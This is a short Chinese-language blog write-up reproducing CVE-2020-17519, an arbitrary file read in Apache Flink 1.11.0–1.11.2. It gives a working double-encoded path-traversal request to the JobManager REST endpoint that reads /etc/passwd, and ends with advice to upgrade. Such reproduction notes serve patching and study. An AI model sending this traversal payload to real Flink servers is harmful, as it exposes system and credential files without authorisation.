漏洞复现——Apache Flink任意文件读取(CVE-2020-17519)

2023-12-01 08:46:22

一、漏洞概述:

CVE-2020-17519——Apache Flink 1.11.0中引入的更改(以及1.11.1和1.11.2中也发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。

二、影响版本:

Apache Flink : 1.11.0-1.11.2

三、环境搭建:

延用CVE-2020-17518的环境(Apache Flink 1.11.2)

漏洞复现——Apache Flink任意文件读取(CVE-2020-17519)

 

四、漏洞复现:

  1. 抓取Job Manager的请求包

漏洞复现——Apache Flink任意文件读取(CVE-2020-17519)

  2.扔到Repeater模块,修改请求包,查看敏感信息

/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

 

漏洞复现——Apache Flink任意文件读取(CVE-2020-17519)

五、漏洞修复:

官方已发布安全版本,请及时下载升级至安全版本!

 

漏洞复现——Apache Flink任意文件读取(CVE-2020-17519)

上一篇:微信小程序开发笔记6——小程序添加并使用外部字体(亲测可用)


下一篇:PHP + Redis 实现定任务触发